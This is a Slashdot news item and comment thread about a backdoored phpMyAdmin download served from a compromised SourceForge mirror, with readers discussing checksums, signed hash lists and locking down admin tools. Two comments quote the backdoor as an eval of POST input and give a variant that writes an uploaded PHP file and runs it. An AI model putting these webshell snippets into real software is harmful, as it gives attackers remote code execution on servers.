Beta
×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Malicious PhpMyAdmin Served From SourceForge Mirror

Unknown Lamer posted more than 2 years ago | from the tin-foil-hat-activate dept.

PHP 86

An anonymous reader writes with a bit of news about the compromised download of phpMyAdmin discovered on an sf.net mirror yesterday: "A malicious version of the open source Web-based MySQL database administration tool phpMyAdmin has been discovered on one of the official mirror sites of SourceForge, the popular online code repository for free and open source software. The file — phpMyAdmin-3.5.2.2-all-languages.zip — was modified to include a backdoor that allowed attackers to remotely execute PHP code on the server running the malicious version of phpMyAdmin." The Sourceforge weblog has details. Someone compromised a mirror (since removed from rotation of course) around September 22nd. Luckily, only around 400 people grabbed the file before someone caught it.

Sorry! There are no comments related to the filter you selected.

True open sores experience (2, Insightful)

Jkala (2739767) | more than 2 years ago | (#41464063)

They should had md5'd files after downloading.

Re:True open sores experience (4, Informative)

lindi (634828) | more than 2 years ago | (#41464229)

How would you know which md5 hash was correct? They are listed in http://www.phpmyadmin.net/home_page/downloads.php [phpmyadmin.net] which is also hosted by sourceforge.

Re:True open sores experience (2)

X0563511 (793323) | more than 2 years ago | (#41464323)

The mirrors are third-party and not under direct control of SF. I know, when I was working a datacenter one of our customers ran a mirror for them.

Re:True open sores experience (4, Informative)

petermgreen (876956) | more than 2 years ago | (#41464373)

If sourceforge is totally compromised you are right but still the chances of that happening are almost certainly lower than the chances of a random download mirror being compromised, so checking md5s is still a good idea.

Re:True open sores experience (5, Informative)

vlm (69642) | more than 2 years ago | (#41464817)

How would you know which md5 hash was correct?

We could reinvent the wheel, but (as usual) the Debian wizards figured it all out years ago, in this case, they solved the problem in 2003.

You make a big list of valid hashes, GPG sign the list with a well known key that is changed every couple years or so (for a good time see Debian package named debian-keyring), and publish it.

For a good time on a Debian box go to /var/lib/apt/lists and look at a packages file. Assuming you're using wheezy/amd64 the system won't let you install the latest 0ad package (wtf that package is) version 0r11863-2 unless the md5 hash of that package is some big ole number ending in 79eb. Also sha1 and sha256 hashes.

For a good time see

http://wiki.debian.org/SecureApt [debian.org]

I can hand you a questionable looking flash drive with debian packages on it and if the multiple signed hashes match Debian's official gpg signed hash list you can trust my binaries... I can't inject something extra without Fing up at least one of the three hashs.

Or, just go ahead and reinvent the wheel... thats a Security Best Practices that never leads to problems, rock on with your NIH self man!

Re:True open sores experience (1)

lindi (634828) | more than 2 years ago | (#41465427)

I'm well aware that technology but I don't see how it is relevant here. I doubt you can convince the phpmyadmin developers to require the use of apt for downloading new releases of their software.

Re:True open sores experience (1)

TheLink (130905) | more than 2 years ago | (#41465759)

You're not that aware of the technology or it would be obvious to you what he meant by: "You make a big list of valid hashes, GPG sign the list..."

You do it this way:
http://www.djangoproject.com/m/pgp/Django-1.2.7.checksum.txt [djangoproject.com]

The stuff between: -----BEGIN PGP SIGNED MESSAGE-----
and:-----BEGIN PGP SIGNATURE-----

are signed by the corresponding signature.

more examples: http://distfiles.gentoo.org/releases/amd64/current-iso/stage3-amd64-20120621.tar.bz2.DIGESTS.asc [gentoo.org]

Re:True open sores experience (1)

Agent ME (1411269) | more than 2 years ago | (#41470529)

You don't have to use APT just to sign a simple text file list of hashes.

Re:True open sores experience (1)

Firehed (942385) | more than 2 years ago | (#41470769)

Well, you either use the signed (secure) distribution method and guarantee that you got what you asked for, or you don't. If they don't want to distribute it in such a way that their signature can be verified, that's their business - but that means this kind of thing can happen.

Not that it would likely matter. Their lack of support for signed code means they probably would leak their private key, thus negating any gains it would otherwise bring (and then some, as you have misplaced trust rather than no trust at all)

Re:True open sores experience (0)

Anonymous Coward | more than 2 years ago | (#41465795)

You make a big list of valid hashes, GPG sign the list with a well known key that is changed every couple years or so (for a good time see Debian package named debian-keyring), and publish it.

Or even better, just sign the damn package.
Either way don't use MD5, it's so broken as to be useless for security purposes. SHA-1 or SHA-256 are fine, the latter is preferred for new applications.

Re:True open sores experience (0)

Anonymous Coward | more than 2 years ago | (#41466193)

0ad is a free game, I think thats what the package name refers to:

http://www.wildfiregames.com/0ad/

Re:True open sores experience (1)

MaerD (954222) | more than 2 years ago | (#41466845)

I got it, I got it, I got it!
I got your number on the wall!
I got it, I got it, I got it!
For a good time, for a good time call....

Jenny, don't change your number.
I need to make you mine.
Jenny. I'll call your number,
  812a11b49b1a1cce5dd9a0018899501e
  812a11b49b1a1cce5dd9a0018899501e

Maybe not as catchy as 867-5309?

Re:True open sores experience (0)

Anonymous Coward | more than 2 years ago | (#41466953)

0AD is an awesome free historical 3rd person pov game

Get file and MD5 from separate sources (1)

perpenso (1613749) | more than 2 years ago | (#41465913)

How would you know which md5 hash was correct?

OK, maybe I'm paranoid, but I usually get the download file and the MD5 from separate sources. Ideally the MD5 is from the home site of the project rather than one of its mirrors.

Re:True open sores experience (1)

helix2301 (1105613) | more than 2 years ago | (#41466731)

They did not compromise source forge themselves they compromised one of the mirror sites.

Re:True open sores experience (0)

Anonymous Coward | more than 2 years ago | (#41466791)

Do you understand the difference between a single mirror somewhere out there and the entire system and main hosting servers?

Go away you retarded person...

Re:True open sores experience (0)

Intrepid imaginaut (1970940) | more than 2 years ago | (#41464355)

And had this been a Microsoft experience, millions of people would probably have downloaded it and never been informed when it was patched six months later - if it had been caught at all. I mean where did you think all those botnets are coming from?

Re:True open sores experience (0)

Anonymous Coward | more than 2 years ago | (#41464461)

Wasen't that the true MS experience back when they shipped those CIH infected floppies?

Re:True open sores experience (1)

Bill, Shooter of Bul (629286) | more than 2 years ago | (#41477011)

They were downloading PhpMyAdmin, they're not the most tech savy of users...

Truly! I am shocked! (1)

For a Free Internet (1594621) | more than 2 years ago | (#41464093)

This was probably the work of Joel the evil computer destroyer he is such a loser, and he has no frenids. Always ordering dominoes pizzas, what a sick fatass loser.

Re:Truly! I am shocked! (1, Funny)

X0563511 (793323) | more than 2 years ago | (#41464343)

I don't have any frenids either.

What's a frenid again?

Re:Truly! I am shocked! (1)

jones_supa (887896) | more than 2 years ago | (#41465879)

The parent has a point. It should be made clear that people destroying other people's data actually are sick fatass losers.

What's the problem? (0, Funny)

Anonymous Coward | more than 2 years ago | (#41464115)

It's open source so I'm sure all the users did a code review and found the problem. This is why open source is more secure and less buggy than closed source software.

Re:What's the problem? (2, Informative)

Anonymous Coward | more than 2 years ago | (#41464143)

No, but if any of them md5'd it they would have caught it. And in way less time than doing a code review!

Re:What's the problem? (1)

Sir_Sri (199544) | more than 2 years ago | (#41464931)

And how many people actually do that? Presumably one of the 400 who downloaded it did, figured out who to alert and that's why we know.

But that's a very very small percentage.

This is likely a UI problem, doing an MD5 is easy enough, it's a matter of browsers showing them automatically and keeping the 'official' md5 page around while the download is finishing. None of this is hard, but the vast majority of users don't.

Re:What's the problem? (0)

Anonymous Coward | more than 2 years ago | (#41465233)

It is a UI problem. On Linux you generally have to open a terminal to very a hash, and on Windows there's just no built in facility.

Re:What's the problem? (0)

Anonymous Coward | more than 2 years ago | (#41465993)

On Linux you generally have to open a terminal to very a hash, and on Windows there's just no built in facility.

By "no built in facility" you mean the Windows user has to install a md5 utility before they open the Windows terminal and type in the command pretty much like the Linux user does?

Re:What's the problem? (0)

Anonymous Coward | more than 2 years ago | (#41466395)

Windows user has to install HashTab and get a convenient property tab with crc, md5 and sha1. Pretty sure there was something like that for Linux too, but md5sum usually comes as one of preinstalled packages.

Re:What's the problem? (0)

Anonymous Coward | more than 2 years ago | (#41467309)

No, I meant what I wrote, not what you thought I meant even though I gave absolutely no indication of it in my post. Built-in meaning that 99% of distros you will use have a bunch of CRCs and SHAs in your PATH straight from the install. Windows will require you to find the program online, copy the file to some random folder and add it to your path. Most Windows users have no idea how to do this.

Re:What's the problem? (1)

Dishevel (1105119) | more than 2 years ago | (#41466025)

On Linux you generally have to open a terminal to very a hash

Generally I use one of the terminal windows I already have open.

Re:What's the problem? (1)

perpenso (1613749) | more than 2 years ago | (#41465947)

No, but if any of them md5'd it they would have caught it.

Assuming they didn't get the MD5 from the same site.

Re:What's the problem? (0)

Anonymous Coward | more than 2 years ago | (#41466107)

MD5 doesn't come from the same server. MD5 is hosted on sourceforge. The malicious package was hosted on one of their many mirrors. The server the package came from and the server on which the MD5 is hosted are entirely different. The only way that what you're saying would be applicable is if sourceforge itself was breached, which is not what happened here.

Re:What's the problem? (0)

Anonymous Coward | more than 2 years ago | (#41473813)

MD5 doesn't come from the same server. MD5 is hosted on sourceforge. The malicious package was hosted on one of their many mirrors. The server the package came from and the server on which the MD5 is hosted are entirely different. The only way that what you're saying would be applicable is if sourceforge itself was breached, which is not what happened here.

It depends on the site. There are plenty of FOSS projects that have a MD5.txt or similar file on the same server.

Re:What's the problem? (1)

Anonymous Coward | more than 2 years ago | (#41464333)

Your point being? The problem was found within days. Compare that to what things would have looked like, had it been closed source. It's highly unlikely the backdoor would've been detected any sooner then.

Re:What's the problem? (-1)

Anonymous Coward | more than 2 years ago | (#41464429)

The companies already know about the back doors in their own closed-source software. They put it there specifically for the NSA.

Re:What's the problem? (1)

gmuslera (3436) | more than 2 years ago | (#41465001)

In fact, some backdoors keeps being there for years until, well, it went open source, happened with Interbase [securityfocus.com] . And it was just the initiative of a single programmer, not company policy or government agencies requirement.

"weblog"? (5, Funny)

i kan reed (749298) | more than 2 years ago | (#41464179)

Is this 1998? Was the malicious file found on the world wide web?

Re:"weblog"? (4, Insightful)

Anonymous Coward | more than 2 years ago | (#41464811)

What's wrong with that? It's a vastly better word than blog.

Re:"weblog"? (2)

i kan reed (749298) | more than 2 years ago | (#41466355)

I know just how you feel, I make calls with my cellular telephone all the time. Words should never be abbreviated at all.

Re:"weblog"? (1)

hazah (807503) | more than 2 years ago | (#41466437)

Except that one of these words is ubiquitous and the other is not. Definitions of words follow from their use, not the other way around.

Sourceforge problems.. (3, Informative)

undulato (2146486) | more than 2 years ago | (#41464293)

I think someone's head is in the clouds at the moment what with the recent buyout of sourceforge, slashdot et al [engadget.com] . I'm with a big ol' (12 year) open source project on Sourceforge and it's going through the migration procedure currently to the new Sourceforge look and feel - lots of problems, lots of broken stuff, unhappy admins and developers and slow response to tickets.

There are plenty of alternatives out here now for the open source types to host their code. It might be time to start thinking about exit strategies..

Did you use open source code (0, Insightful)

Anonymous Coward | more than 2 years ago | (#41464311)

to save time and the virus was hidden in it?

Re:Did you use open source code (2)

hazah (807503) | more than 2 years ago | (#41464469)

Is this a really shitty attempt at a troll?

Re:Did you use open source code (0)

Anonymous Coward | more than 2 years ago | (#41464521)

www.youtube.com/watch?v=AiVnMazRIII

Re:Did you use open source code (1)

hazah (807503) | more than 2 years ago | (#41466451)

I'll take that as a 'yes'.

Re:Did you use open source code (-1)

Anonymous Coward | more than 2 years ago | (#41468533)

Someone's butthurt for no discernable reason.

Re:Did you use open source code (1)

hazah (807503) | more than 2 years ago | (#41476147)

I hope you'll make it.

Duh. (4, Insightful)

Tyler Eaves (344284) | more than 2 years ago | (#41464349)

Anyone who understands how security works would consider phpMyAdmin's very existence on a server to be a security hole.

Local GUI client + ssh tunnel ftw.

Re:Duh. (4, Informative)

xombo (628858) | more than 2 years ago | (#41464479)

My experience, exactly. I can't tell you how many times I've been asked to look into a problem with a web server only to find that their logs are packed with failed login attempts pointed at /phpmyadmin. It's bad enough that it blindly installs itself as a subdirectory in every Apache vhost you run; but their lack of default password attempt limits and bans (especially given its popularity and the level of access it provides) is downright irresponsible.
There are literally botnets that do nothing more than cruise around the internet looking for phpmyadmin installations.

Re:Duh. (1)

Anonymous Coward | more than 2 years ago | (#41464827)

Please propose a way to block hacking attempts coming from the same person, spread over multiple IPs which are not in the same range and are on a stateless protocol.
No you may not add rules to the firewall since you tool (phpmyadmin) has to handle that.

Re:Duh. (1)

gregarican (694358) | more than 2 years ago | (#41464945)

Why would any web admin tool have open access from any public IP in the first place? I know that the way I handle things for what I host here I limit access to certain narrow IP subnets that cover where the regular admin users would be coming from. Then if someone cannot access the tool because they are temporarily coming in from a different IP range then I can add that on the fly. You figure that, combined with some mechanism for temporarily disabling login access after a set number of failed attempts in a set period of time, makes things at least a little more secured.

This is all outside of the PHP arena that I'm talking about, but the concepts should be similar, no?

Re:Duh. (1)

Anonymous Coward | more than 2 years ago | (#41467275)

Require login credentials input twice. Spit out a failure on the first attempt.

Re:Duh. (0)

Anonymous Coward | about 2 years ago | (#41533857)

Totally agree. We run a Java server, but see log entries every day of hacking attempts/probes, the vast majority trying to access phpmyadmin.

Re:Duh. (5, Funny)

Zenin (266666) | more than 2 years ago | (#41464953)

Anyone who understands how security works would consider php's very existence on a server to be a security hole.

There, I fixed it for you. You're welcome.

Re:Duh. (0)

hazah (807503) | more than 2 years ago | (#41466499)

And you've added absolutely nothing of value. We've heard your opinions. We've considered them. We found them to be irrelevant and useless. We prefer you direct your noise hole elsewhere.

Re:Duh. (1)

Safety Cap (253500) | more than 2 years ago | (#41470577)

We prefer you direct your noise hole elsewhere.

Oh dear. Just relax and let the butthurt flow through you [photobucket.com] .

Re:Duh. well (1)

Safety Cap (253500) | more than 2 years ago | (#41470369)

Anyone who understands how security works would consider php's very existence on a server to be a security hole.

There, I fixed it for you. You're welcome.

Not so much PHP (although every function is broken in some way), but the fact that any n00b can pick it up and start "programming." Without a harsh feedback loop, poor coding practices become calcified and lead to the massive security holes you've observed.

The beauty and curse of PHP is that its default fail state is to act as if nothing bad happened. This keeps unskilled, sloppy n00bs from getting so discouraged with the "NO YOU CAN'T FARKING ASSUME null AND false ARE THE SAME THING, DUMMY!" error messages that they find Something Else To Do like become Energy Meter Readers or Sportscasters or Tiger Food [google.com] .

That is why PHP sucks.

Re:Duh. (1)

gmuslera (3436) | more than 2 years ago | (#41465069)

In fact some years ago the web servers log were clogged by bots searching for installations of phpmyadmin, as something usually deployed and exploitable. If it have to be installed (and can't be restricted access using ssh tunnel/vpn/specific ip to mysql), at least that not be in a default directory name, and have a password protecting the directory access.

Re:Duh. (1)

MrLizardo (264289) | more than 2 years ago | (#41471581)

I do something a bit different. I tend to put any admin tools up in an /admin directory (ex, https://example.com/admin/phpmyadmin [example.com] ), then use HTTP basic authentication to require users to authenticate with a username/password in our LDAP directory (but you could use local shell accounts as well). That way someone would need to first compromise a user account before they could even *start* trying to compromise one of the admin tools. I tend to think of it as a similar idea to not allowing remote root logins in ssh. Login first and sudo/su. I'm actually surprised that this isn't used more often. Am I missing an obvious security implication? Or is it just a case of people being lazy?

hate phpMyAdmin (1)

Anonymous Coward | more than 2 years ago | (#41464497)

I used to work in a Managed Hosting department, and customers would insist on having this piece of crap on the server. I hated it because there was always some vuln version that they ABSOLUTELY had to have. Finally a new exploit came out for a current version(at the time), and we had two compromises... Then we banned it across the entire customer base. There are too many alternatives to use this piece of garbage. However I suggest insisting your users run something on their local client side and not on your server... eg: heidisql, sequel pro, etc. So it doesnt surprise me at all that this occurred. LEARN YOUR LESSON ALREADY PEOPLE!

Re:hate phpMyAdmin (0)

Anonymous Coward | more than 2 years ago | (#41464539)

You think you've got it bad providing hosting? I have to interview people whose only exposure to SQL is via this garbage.

Re:hate phpMyAdmin (1)

Anonymous Coward | more than 2 years ago | (#41464619)

insisting your users run something on their local client side and not on your server

Doesn't this involve allowing MySQL to accept connections from places other than localhost?

I think I'll stick to PuTTY + Postgres command line.

Re:hate phpMyAdmin (0)

derfy (172944) | more than 2 years ago | (#41464867)

Not if you set up PuTTY to tunnel the remote machine's mysql port to a local port and using a GUI (or command line, if you like)

Which is the scary part? (5, Insightful)

Michalson (638911) | more than 2 years ago | (#41464589)

A widely used web package has a backdoor inserted.

Scary.

One of the regional mirrors of the largested software respository containing tens of thousands of projects is either hacked or was a plant from the start.

Scarier.

The backdoor code [arstechnica.com] looks to be the work of someone who learned PHP on Monday.

Scariest.

Honestly, the only way it could have been more obvious is if the file was called backdoor.php. There was no attempt made to disguise the location or what the code was doing which is why it got caught so quickly. A complete amateur got caught with control over a chunk of Sourceforge downloads. In computer security when you find a breach you don't just close the obvious point of entry, you have to take a big step back and seriously ask 'what else was compromised'. In this case the big question is who else.

If this clown could do it and didn't get caught until an end user saw the stupidly obvious file and its stupidly obvious code (as opposed to a server log or other Sourceforge audit turning it up) what are the competent hackers up to. Real backdoors are blended into the existing code instead of being added as a seperate file. Real backdoors are designed to be hidden from casual inspection instead being completely obvious in their function and 'I don't belong here status'. Really good backdoors are designed to not look like intentionally malicious code even after they are found (ex. the wait4 backdoor attempt in the Linux kernel was pretty good, it got caught because the CVS hack used to insert it in a regional CVS mirror was flawed in several ways that raised alarms).

So, what kind of security/procedure/audit could have been in place, needs to be in place, so that something like this will raise an alarm even when the hacker isn't the most incompetent backdoor author in history? What kind of audit is needed to be sure it hasn't already happened?

Re:Which is the scary part? (1)

gregarican (694358) | more than 2 years ago | (#41464805)

My biggest concern as someone who has a SF project out there (albeit decrepit), is what auditing/security measures does SF employ to screen their mirroring hosts? You'd think that there would at least be some high-level auditing performed to ensure that all of the open source code is somewhat secure...

Re:Which is the scary part? (0)

Anonymous Coward | more than 2 years ago | (#41465279)

No, you wouldn't think that. You'd think that the project in question would probably cryptographic hashes of their files on a different site than SourceForce so that the mirror files could be verified to be trusted.

Re:Which is the scary part? (1)

ItsJustAPseudonym (1259172) | more than 2 years ago | (#41468013)

That's a good comment. Why post as AC?

Re:Which is the scary part? (0)

Anonymous Coward | more than 2 years ago | (#41485469)

Because otherwise I'd need to press log in.

Re:Which is the scary part? (0)

Anonymous Coward | more than 2 years ago | (#41465403)

The backdoor code looks to be the work of someone who learned PHP on Monday.

No, all PHP naturally looks like that.

Re:Which is the scary part? (1)

hazah (807503) | more than 2 years ago | (#41466545)

And I'm sure you're qualified to make that assertion. /sarcasm

Re:Which is the scary part? (0)

Anonymous Coward | more than 2 years ago | (#41470345)

If spent more than enough time running shared hosting platforms, thanks for asking. By the way, you need to replace your literal < and > characters with the appropriate HTML entities if you want them to show up on Slashdot, but I'm sure you knew that, being a PHP genius and all.

Re:Which is the scary part? (1)

hazah (807503) | more than 2 years ago | (#41476215)

I hadn't typed out neither &gt; nor &lt;. I only typed the slash. It seemed sufficient and no literal > or < were harmed in the process of writing the post. Not sure what this has to do with being a "PHP genius" (Is that like one 'em "Mapple Genius"?). As per your supposed experience, so far it's just smoke and mirrors.

Re:Which is the scary part? (0)

Anonymous Coward | more than 2 years ago | (#41488809)

Or maybe he didn't want to type the tag part of a non-tag... how butthurt are you to fall back on something this stupid as your defense?

Re:Which is the scary part? (1)

ibennetch (521581) | more than 2 years ago | (#41465683)

You're close, except:

A widely used web package has a backdoor inserted.

is mostly incorrect, it wasn't the phpMyAdmin project, it wasn't that the source code was compromised; the problem is that one specific mirror was compromised and a modified copy of the phpMyAdmin source was distributed instead of the official files. It's a stretch to blame that on the phpMyAdmin project.

So, what kind of security/procedure/audit could have been in place, needs to be in place, so that something like this will raise an alarm even when the hacker isn't the most incompetent backdoor author in history? What kind of audit is needed to be sure it hasn't already happened?

I'm thinking of some sort of mathematical function where you plug in an arbitrary number of bits, say an entire file, and get out a small representation that is very, very difficult to duplicate. We could call it a hash, I suppose. Then you post the hash to the main web page for each file you distribute, and when someone downloads a file, then compare the hash of the downloaded file to the hash on the web site. Since the mirrors only host the downloads, and not the website, a compromised mirror wouldn't be able to change the website's hash. I need to find a patent attorney, I could make millions on this idea!

(please note that paragraph probably sounds more snarky than it was intended)

Now the ethical question remaining (0)

Anonymous Coward | more than 2 years ago | (#41464615)

of course is, should they use the backdoor to warn the users?

how far? (3)

WGFCrafty (1062506) | more than 2 years ago | (#41464697)

I have used phpmyadmin while learning about servers/web hosting (on my only computer to experiment) and while dealing with the Gallery php software on a more recently hosted site (not on my computer), so I have a general idea of what it does and how to use it (as basic as it gets like backing up DBs).

My question is when the backdoor gives full access to the hacker, what is the extent of compromise? Does it give you all data but you cannot read the passwords ? Do you have the ability to decrypt passwords by gaining root access with this or is the data still protected?

Forgive my ignorance

Re: how far? (0)

Anonymous Coward | more than 2 years ago | (#41464933)

It's a single line script that reads "eval($_POST['somevar'])", so it can do everything possible with permissions granted to web server.

Poke around /var/www, drop a phishing page, probe for local vulnerabilities and exploit them, ...

Strange choice (1)

nedlohs (1335013) | more than 2 years ago | (#41465163)

Does anyone put a phpmyadmin open to the world? Not just passworded but on a port that is firewalled off from all but a set of trusted ips???

I guess it has PHP in the name so probably some idiots do.

Re:Strange choice (0)

Anonymous Coward | more than 2 years ago | (#41469647)

if by some idiots you mean "most shared webhosting services" then sure, "some idiots" do that. The only problem is that there is a significant number of idiots running things...

Hardened PHP -- Suhosin (1)

magic maverick (2615475) | more than 2 years ago | (#41465697)

The backdoor was basically an eval that ran anything posted to it (according to the Ars article posted up thread [arstechnica.com] ). On my web host, Suhosin [hardened-php.net] is enabled by default, and setup to block eval from ever running.

I.e. Even if I had installed this bad version of PhpMyAdmin, I would not have anything to worry about with regards that eval statement. So, security hey. It's hard, but not that hard.

Re:Hardened PHP -- Suhosin (0)

Anonymous Coward | more than 2 years ago | (#41470873)

It's worth noting that Suhosin is mainly intended to protect you from yourself and from the PHP developers. E.g., eval can be disabled because it is commonly used in poorly written code to evaluate unsanitized user input.

It just so happens that this backdoor used eval for convenience, but they could have inserted any PHP code they wanted - there's no reason they couldn't have made a Suhosin compatible version.

Still, Suhosin is absolutely recommended for anyone running any PHP on their servers. Even if you trust your own code, PHP itself has a pretty spotty security record.

Re:Hardened PHP -- Suhosin (0)

Anonymous Coward | more than 2 years ago | (#41475271)

That's a good barrier (defense in depth and all), but it would've been easily circumvented in this case

instead of the current one liner
      eval($_POST['somevar']);

he couldve used something more akin to
      file_put_contents('localexploitfile.php', $_POST['somevar']);

and then visit http://yourhost/phpmyadmin/localexploitfile.php to execute the code

Mirrors are problematic (1)

jones_supa (887896) | more than 2 years ago | (#41466013)

This is a reason why I generally avoid using mirrors.

Re:Mirrors are problematic (0)

Anonymous Coward | more than 2 years ago | (#41466419)

Or perhaps you're a vampire?

A simpler alternative to phpMyAdmin (1)

ItsJustAPseudonym (1259172) | more than 2 years ago | (#41467849)

As an alternative, one can use phpMiniAdmin [sourceforge.net] . Way smaller, with fewer places to hide malicious code. Also, being less complicated than phpMyAdmin, it is easier to get it running.

Debian had a hole in OpenSSL a while back (0)

Anonymous Coward | more than 2 years ago | (#41497187)

I am surprised that the OpenSSL hole in Debain didn't cause people to leave Debain in droves. That's why I use CentOS on my servers now, not because I like it more than Debian, but because I cannot trust the Debain project allowing incompetent teenagers to work on core system security libraries. This will have to happen more than once for people to question sourceforge over their security practices.

Check for New Comments
Slashdot Login

Need an Account?

Forgot your password?